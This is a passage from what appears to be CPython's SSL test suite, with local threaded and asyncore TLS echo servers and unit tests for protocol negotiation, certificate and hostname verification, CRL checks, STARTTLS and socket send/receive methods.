self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer (asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
def start (self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_TLS:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(SIGNED_CERTFILE)
ctx.load_verify_locations(SIGNING_CA)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
if protocol in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
continue
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
client_context, server_context, hostname = testing_context()
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
do_handshake_on_connect=False,
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# getpeercert() raise ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(client_context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
client_context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
client_context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(
ssl.CertificateError,
"Hostname mismatch, certificate is not valid for 'invalid'."):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
client_context.wrap_socket(s)
def test_ecc_cert(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers(
'TLS13-AES-128-GCM-SHA256:TLS13-CHACHA20-POLY1305-SHA256:'
'ECDHE:ECDSA:!NULL:!aRSA'
)
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC cert
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_dual_rsa_ecc(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
# TODO: fix TLSv1.3 once SSLContext can restrict signature
# algorithms.
client_context.options |= ssl.OP_NO_TLSv1_3
# only ECDSA certs
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC and RSA key/cert pairs
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
server_context.load_cert_chain(SIGNED_CERTFILE)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_check_hostname_idn(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(IDNSANSFILE)
# TODO: fix TLSv1.3 support
server_context.options |= ssl.OP_NO_TLSv1_3
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify, when specified in several
# different ways
idn_hostnames = [
('könig.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
(b'xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('königsgäßchen.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
('xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
(b'xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
# ('königsgäßchen.idna2008.pythontest.net',
# 'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
('xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
(b'xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
]
for server_hostname, expected_hostname in idn_hostnames:
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=server_hostname) as s:
self.assertEqual(s.server_hostname, expected_hostname)
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertEqual(s.server_hostname, expected_hostname)
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="python.example.org") as s:
with self.assertRaises(ssl.CertificateError):
s.connect((HOST, server.port))
def test_wrong_cert(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
client_context, server_context, hostname = testing_context()
# load client cert
client_context.load_cert_chain(WRONG_CERT)
# require TLS client authentication
server_context.verify_mode = ssl.CERT_REQUIRED
# TODO: fix TLSv1.3 support
# With TLS 1.3, test fails with exception in server thread
server_context.options |= ssl.OP_NO_TLSv1_3
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
def test_ssl_cert_verify_error(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
try:
s.connect((HOST, server.port))
except ssl.SSLError as e:
msg = 'unable to get local issuer certificate'
self.assertIsInstance(e, ssl.SSLCertVerificationError)
self.assertEqual(e.verify_code, 20)
self.assertEqual(e.verify_message, msg)
self.assertIn(msg, repr(e))
self.assertIn('certificate verify failed', repr(e))
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_PROTOCOL_TLS(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS,
False, client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=SIGNED_CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=SIGNING_CA)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
